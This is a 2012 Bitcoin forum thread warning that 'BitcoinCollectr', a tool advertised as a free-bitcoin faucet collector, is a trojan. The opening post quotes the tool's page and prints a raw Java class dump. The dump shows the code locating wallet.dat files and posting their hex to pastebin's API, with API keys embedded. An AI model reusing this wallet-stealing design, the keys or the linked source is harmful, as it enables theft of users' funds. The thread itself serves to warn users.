Author

Topic: trojan warning "BITCOINCOLLECTR" (Read 2097 times)

hero member
Activity: 826
Merit: 500
June 06, 2012, 07:50:07 PM
#10
the virus is pretty cool though
rjk
sr. member
Activity: 448
Merit: 250
1ngldh
May 30, 2012, 08:23:27 PM
#9
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?
full member
Activity: 134
Merit: 100
May 30, 2012, 08:14:43 PM
#8
This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
hero member
Activity: 504
Merit: 500
May 25, 2012, 01:24:02 AM
#7
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 
acl

i think i need to find a mirror to facepalm myself

sr. member
Activity: 476
Merit: 250
May 25, 2012, 01:21:13 AM
#6
is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 
acl
hero member
Activity: 504
Merit: 500
May 25, 2012, 01:18:10 AM
#5
there is another one too that people have fallen for "neheminer" or something, claims to  be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though) 

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 
sr. member
Activity: 476
Merit: 250
May 25, 2012, 01:10:24 AM
#4
Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...
legendary
Activity: 1862
Merit: 1114
WalletScrutiny.com
May 24, 2012, 06:40:11 PM
#3
not too eager to investigate the claims but if it's true, why is this thread so quiet?
rjk
sr. member
Activity: 448
Merit: 250
1ngldh
May 24, 2012, 10:47:25 AM
#2
Please break your links so that they do not get indexed and flagged.
hero member
Activity: 826
Merit: 500
May 24, 2012, 10:42:31 AM
#1
WARNING! this tool tries to steal your wallet.dat!!!


this guy ( https://bitcointalksearch.org/user/meneken-57949 ) tries to lure people into using this tool via his signature right now!!

http://btccollectr.bt.ohost.de/

Quote
BitcoinCollectr

beta

What is it?

BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.

Where can I get it?

Download here. Consider that it's still beta and probably buggy. Please report bugs to me.

Contact

[email protected]

Donation

I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX


Code:
CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00\00()V\00Code
\00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService
\00\00 \00\00Bitcoin Faucet \00\00 \00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00 \00\00\00url?tz\E1G\AE{ \00\00! \00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00 BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList
\00H\00 \00L\00N\00M\00java/util/List \00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{ \00L\00T \00U\00V\00iterator\00()Ljava/util/Iterator; \00X\00Z\00Y\00java/util/Iterator \00[\00\\00next\00()Ljava/lang/Object;?\F3333333 \00X\00` \00a\00b\00hasNext\00()Z\00d\00>..............................................................
\00\00f \00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta                          5/13/12  :\00l\00>:                                                            :\00n\00>: Author: Yus0r ([email protected])                          :\00p\00\00\00r\00: Looking for updates..\00t\00http://btccollectr.bt.ohost.de
\00v\00x\00w\00Util \00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String;
\00\00| \00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00 java/io/File
\00\00\82 \00\00h
\00\00\84 \00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B
\00v\00\88 \00\89\00\8A\00asHex\00([B)Ljava/lang/String;
\00\00\8C \00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00
: Supporting
\00\90\00\82 \00L\00\96 \00\97\00\98\00size\00()I
\00\90\00\9A \00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites.
\00\90\00\A0 \00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder;
\00\90\00\A3 \00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00
\00\90\00\AA \00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System \00\B8\00\B9\00in\00Ljava/io/InputStream;
\00\B2\00\BB \00\00\BC\00(Ljava/io/InputStream;)V
\00\B0\00\BE \00\00\BF\00(Ljava/io/Reader;)V
\00\B0\00\C1 \00\C2\00~\00readLine\00\C4\00 : Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException
\00\C9\00\82
\00\CD\00\CF\00\CE\00java/lang/Exception \00\D0\00\00printStackTrace
\00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List;\00
StackMapTable\00\D5\00\F1\00java/lang/String\00
Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00 api_dev_key\00\F8\00UTF-8
\00\FA\00\FC\00\FB\00java/net/URLEncoder \00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
\00\F0\00 \00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00&
\00
api_option \00paste\00 api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00 java/net/URL\00$http://pastebin.com/api/api_post.php
\00\82
 \00openConnection\00()Ljava/net/URLConnection;
\00java/net/URLConnection  !\00 setDoOutput\00(Z)V#\00java/io/OutputStreamWriter
% &'\00getOutputStream\00()Ljava/io/OutputStream;
") \00*\00(Ljava/io/OutputStream;)V
", -\00h\00write
"/ 0\00\00flush
2 34\00getInputStream\00()Ljava/io/InputStream;
"6 7\00\00close
\00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name
\00\B5E F\00z\00 getPropertyH\00Linux
\00\F0J KL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA
\00\B5T U\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream
Y\ \00]\00(Ljava/io/File;)V
\00_ `a\00length\00()J
Yc de\00read\00([B)I
Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5l mn\00out\00Ljava/io/PrintStream;
prq\00java/io/PrintStream s\00h\00println\00
SourceFile\00 Main.java
Jump to: